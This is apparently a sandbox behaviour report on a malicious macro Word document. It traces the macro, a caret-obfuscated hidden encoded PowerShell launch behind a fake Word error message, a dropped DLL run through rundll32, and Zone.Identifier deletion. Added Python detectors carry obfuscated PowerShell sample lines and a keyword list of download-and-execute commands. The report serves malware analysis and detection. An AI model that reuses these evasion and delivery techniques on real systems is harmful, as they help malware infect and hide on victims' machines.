                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001E62A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F8ADC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001E96CD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F20C5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001E1CFA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F26F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001E88E5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F12E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F7F1F
Source: PACK.doc | OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation | OLE, VBA macro: Module Wm_t404p8v_, Function Document_open
Source: PACK.doc | OLE indicator, VBA macros: true
Source: Joe Sandbox View | Dropped File: C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll 323F6431FB274E90DC003E567C54CB5E2327E9408F903E49CC6F3E840BF9BCF6
Source: 00000005.00000002.2096562119.0000000000296000.00000004.00000001.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.2096633057.0000000001B66000.00000004.00000001.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
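The two memory matches above are for Florian Roth's PowerShell_Case_Anomaly Yara rule, which keys on PowerShell keywords spelled in casing that no human or tool would produce (the "PowerShell case anomaly found" signature in the summary). The following Python is an added example, not the rule itself and not code from the report or from Joe Sandbox: it approximates the idea on process command lines by comparing each PowerShell keyword against its documented spelling and accepting only all-lower, all-upper or the canonical form. The keyword list and the three sample command lines are constructed for the example; none of them is the command line from this sample.

```python
"""Case-anomaly check for PowerShell command lines (added example; the
keyword list and sample command lines are constructed, not from the report)."""
from typing import List, Optional, Tuple

# Documented spellings. A token that matches one of these case-insensitively
# but is written in none of lower, UPPER or the canonical form is an anomaly
# (e.g. "pOwErShElL", "ByPaSs", "-eNc").
CANONICAL = [
    "PowerShell",
    "-NoProfile", "-NonInteractive", "-WindowStyle", "-ExecutionPolicy",
    "-EncodedCommand", "-Command", "-File", "-NoLogo", "-Sta",
    "Hidden", "Bypass", "Unrestricted",
    "Invoke-Expression", "IEX", "New-Object", "DownloadString", "DownloadFile",
    "Start-Process", "Invoke-WebRequest",
]


def _strip_exe(token: str) -> str:
    return token[:-4] if token.lower().endswith(".exe") else token


def canonical_form(token: str) -> Optional[str]:
    """Canonical spelling the token refers to, or None if it is not a keyword.
    PowerShell accepts any unambiguous prefix of a parameter (-Enc for
    -EncodedCommand), so a prefix maps to the same-length prefix of the
    documented name."""
    low = _strip_exe(token).lower()
    for canon in CANONICAL:
        cl = canon.lower()
        if low == cl:
            return canon
        if canon.startswith("-") and low.startswith("-") and len(low) >= 2 and cl.startswith(low):
            return canon[: len(low)]
    return None


def is_case_anomaly(token: str) -> bool:
    canon = canonical_form(token)
    if canon is None:
        return False
    return _strip_exe(token) not in {canon, canon.lower(), canon.upper()}


def find_case_anomalies(cmdline: str) -> List[str]:
    """Tokens of one command line whose casing is neither lower, UPPER nor canonical."""
    return [tok for tok in cmdline.split() if is_case_anomaly(tok)]


def scan(cmdlines: List[str]) -> List[Tuple[int, List[str]]]:
    """(index, anomalous tokens) for every command line that triggers."""
    hits = []
    for i, line in enumerate(cmdlines):
        found = find_case_anomalies(line)
        if found:
            hits.append((i, found))
    return hits


# Constructed sample process command lines (not taken from the analysed sample).
SAMPLE_CMDLINES = [
    r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
    r"POwersheLL -w hidden -ENCOD JABhAGIAYwBkAGUAZgA=",
    r"pOwErShElL.exe -NoP -NonI -W Hidden -ExEc ByPaSs -eNc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
]

if __name__ == "__main__":
    for idx, toks in scan(SAMPLE_CMDLINES):
        print(f"command line {idx}: case anomaly in {toks}")
```

The first sample line is an ordinary administrative invocation and produces no hit; the second is flagged only on "POwersheLL" (its "-ENCOD" is all upper-case, which the check deliberately accepts, since upper-casing alone is not an anomaly); the third is flagged on four tokens. The check is a heuristic for triage, not a replacement for the Yara rule: it only sees tokens it knows, and an attacker who uses consistent casing passes it.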
Source: O_5Z.dll.5.dr | Static PE information: Section: .rsrc ZLIB complexity 0.994955920298
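A ZLIB complexity of 0.99 for the dropped DLL's .rsrc section means the section's bytes barely compress at all, which is what encrypted or already-compressed data looks like; plain code, strings and resource tables compress to a fraction of their size. That is why a near-1.0 value on .rsrc is a packed-payload indicator. The Python below is an added example of how to compute the metric per section, not Joe Sandbox's implementation (its exact formula is not given on the page, so the ratio here is compressed size over raw size, an assumption). The minimal PE-shaped blob it builds is constructed for the example; it is not O_5Z.dll and is not a runnable executable.

```python
"""Per-section ZLIB complexity of a PE file (added example; the metric's
definition and the test PE are assumptions made for this example)."""
import random
import struct
import zlib
from typing import Dict, List


def zlib_complexity(data: bytes) -> float:
    """Compressed size divided by raw size. Repetitive code and tables drop
    well below 0.5; encrypted or pre-compressed payloads stay near 1.0."""
    if not data:
        return 0.0
    return len(zlib.compress(data, 9)) / len(data)


def pe_sections(blob: bytes) -> Dict[str, bytes]:
    """Walk the PE section table and return {section name: raw bytes}."""
    if blob[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                                   # IMAGE_FILE_HEADER
    num_sections = struct.unpack_from("<H", blob, coff + 2)[0]
    opt_size = struct.unpack_from("<H", blob, coff + 16)[0]
    table = coff + 20 + opt_size                          # first IMAGE_SECTION_HEADER
    sections: Dict[str, bytes] = {}
    for i in range(num_sections):
        name, _vsize, _va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", blob, table + i * 40)
        sections[name.rstrip(b"\0").decode("ascii", "replace")] = blob[raw_ptr:raw_ptr + raw_size]
    return sections


def section_complexities(blob: bytes) -> Dict[str, float]:
    return {name: round(zlib_complexity(data), 3) for name, data in pe_sections(blob).items()}


def packed_sections(blob: bytes, threshold: float = 0.9) -> List[str]:
    """Names of sections whose content looks encrypted or compressed."""
    return [n for n, c in section_complexities(blob).items() if c >= threshold]


def build_test_pe() -> bytes:
    """Constructed minimal PE-shaped blob: a repetitive .text and a .rsrc of
    pseudo-random bytes standing in for an encrypted embedded payload."""
    rng = random.Random(1)
    text = b"\x55\x8b\xec" * 300 + b"\x90" * 124              # 1024 bytes, repetitive
    rsrc = bytes(rng.getrandbits(8) for _ in range(1024))    # 1024 bytes, incompressible
    e_lfanew = 0x40
    headers_end = e_lfanew + 4 + 20 + 2 * 40                  # no optional header
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 0, 0x2102)

    def header(name: bytes, data: bytes, ptr: int) -> bytes:
        return struct.pack("<8sIIII", name, len(data), 0x1000, len(data), ptr) + b"\0" * 16

    return (dos + b"PE\0\0" + coff
            + header(b".text", text, headers_end)
            + header(b".rsrc", rsrc, headers_end + len(text))
            + text + rsrc)


if __name__ == "__main__":
    pe = build_test_pe()
    for name, c in section_complexities(pe).items():
        print(f"{name:8s} ZLIB complexity {c:.3f}")
    print("packed-looking sections:", packed_sections(pe))
```

On a real sample, pass the file's bytes to `section_complexities`; a .rsrc near 1.0 on a DLL that is then run through rundll32, as here, is worth a manual look at the resource directory for the blob the loader decrypts.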
Source: rundll32.exe, 00000006.00000002.2105059366.0000000001C80000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100112011.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000014.00000002.2119718363.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000015.00000002.2351863247.0000000001DC0000.00000002.00000001.sdmp | Binary or memory string: .VBPud<_
Source: classification engine | Classification label: mal100.troj.expl.evad.winDOC@38/8@1/2
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_001F1C88 CreateToolhelp32Snapshot,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10002D70 SysAllocString,CoCreateInstance,PropVariantClear,SysFreeString,SysFreeString,
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$PACK.doc
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRD5A6.tmp
Source: PACK.doc | OLE indicator, Word Document stream: true
Source: PACK.doc | OLE document summary: title field not present or empty
Source: PACK.doc | OLE document summary: edited time not present or 0
Source: C:\Windows\System32\msg.exe | Console Write: ............M........................... .W.......W.....................................#...............................h.......5kU.............
Source: C:\Windows\System32\msg.exe | Console Write: ............M...................A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e.......8.......L.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................................................`I.........v.....................K........m.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....................H..j....................................}..v.....v......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....................H..j..... ..............................}..v.....w......0.................m.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................(..j....................................}..v....@.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................(..j......m.............................}..v............0...............H.m.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#..................j....................................}..v............0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#..................j..... ..............................}..v............0.................m.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'..................j....E...............................}..v.....,......0.................m.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....+..................j....E...............................}..v....@k......0.................m.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\System32\msg.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL
                      Source: PACK.docVirustotal: Detection: 30%
                      Source: PACK.docReversingLabs: Detection: 50%
                      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD 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
                      Source: unknownProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cgjbbwbf\qqtudgd.huj',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Nkqiqdbodnub\wtlcjwyiszo.kcs',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zersybwlygjod\ujnaefcctevs.wag',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gocmtvldv\plpbjoam.bfk',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Uyxqa\ucgv.gdq',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Nxixsue\ekwnwx.zgx',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vgjjq\jcse.fro',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kggdchrkalohz\pkgboheoanvf.hox',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jhnbwsyvosmob\uzkhbqpbyyqm.xoq',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ulduktzjxplnmpb\xnnmpmxkpltkbl.ghw',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ohslgtw\xeprri.cyh',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Adumhgbkvoz\tdxrpdrtbm.quu',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fnniqydokod\xeqkvdqlhe.bce',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wpjypezem\yvgznbmd.qnx',Control_RunDLL
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cgjbbwbf\qqtudgd.huj',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Nkqiqdbodnub\wtlcjwyiszo.kcs',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zersybwlygjod\ujnaefcctevs.wag',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gocmtvldv\plpbjoam.bfk',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Uyxqa\ucgv.gdq',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Nxixsue\ekwnwx.zgx',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vgjjq\jcse.fro',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kggdchrkalohz\pkgboheoanvf.hox',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jhnbwsyvosmob\uzkhbqpbyyqm.xoq',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ulduktzjxplnmpb\xnnmpmxkpltkbl.ghw',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ohslgtw\xeprri.cyh',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Adumhgbkvoz\tdxrpdrtbm.quu',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fnniqydokod\xeqkvdqlhe.bce',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wpjypezem\yvgznbmd.qnx',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2097585819.0000000002CA7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2097585819.0000000002CA7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2097585819.0000000002CA7000.00000004.00000040.sdmp
                      Source: Binary string: E:\WindowsSDK7-Samples-master\WindowsSDK7-Samples-master\winui\shell\appshellintegration\RecipePropertyHandler\Win32\Release\RecipePropertyHandler.pdb source: powershell.exe, 00000005.00000002.2102091328.0000000003A04000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2103937877.000000001000D000.00000002.00020000.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2097585819.0000000002CA7000.00000004.00000040.sdmp
                      Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2097585819.0000000002CA7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2097585819.0000000002CA7000.00000004.00000040.sdmp
                      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2097388541.0000000002870000.00000002.00000001.sdmp
                      Source: PACK.doc | Initial sample: OLE summary subject = National JSON parsing Checking Account overriding metrics Shoes Handcrafted Rubber Chair cross-media

                      Data Obfuscation:

                      Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
                      Source: PACK.doc | Stream path 'Macros/VBA/Oi5oelv0_s4' : High number of GOTO operations
                      Source: VBA code instrumentation | OLE, VBA macro, High number of GOTO operations: Module Oi5oelv0_s4
                      Obfuscated command line found
                      Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD 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
                      PowerShell case anomaly found
                      Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
                      Suspicious powershell command line found
                      Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1000C620 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10008085 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10004ADA push ecx; ret

                      Persistence and Installation Behavior:

                      Creates processes via WMI
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll
                      Source: C:\Windows\SysWOW64\rundll32.exe | PE file moved: C:\Windows\SysWOW64\Cgjbbwbf\qqtudgd.huj

                      Hooking and other Techniques for Hiding and Protection:

                      Hides that the sample has been downloaded from the Internet (zone.identifier)
                      Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Windows\SysWOW64\Cgjbbwbf\qqtudgd.huj:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Windows\SysWOW64\Nkqiqdbodnub\wtlcjwyiszo.kcs:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Windows\SysWOW64\Zersybwlygjod\ujnaefcctevs.wag:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Windows\SysWOW64\Gocmtvldv\plpbjoam.bfk:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Windows\SysWOW64\Uyxqa\ucgv.gdq:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Windows\SysWOW64\Nxixsue\ekwnwx.zgx:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Windows\SysWOW64\Vgjjq\jcse.fro:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Windows\SysWOW64\Kggdchrkalohz\pkgboheoanvf.hox:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Windows\SysWOW64\Jhnbwsyvosmob\uzkhbqpbyyqm.xoq:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Windows\SysWOW64\Ulduktzjxplnmpb\xnnmpmxkpltkbl.ghw:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Windows\SysWOW64\Ohslgtw\xeprri.cyh:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Windows\SysWOW64\Adumhgbkvoz\tdxrpdrtbm.quu:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Windows\SysWOW64\Fnniqydokod\xeqkvdqlhe.bce:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Windows\SysWOW64\Wpjypezem\yvgznbmd.qnx:Zone.Identifier read attributes | delete
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
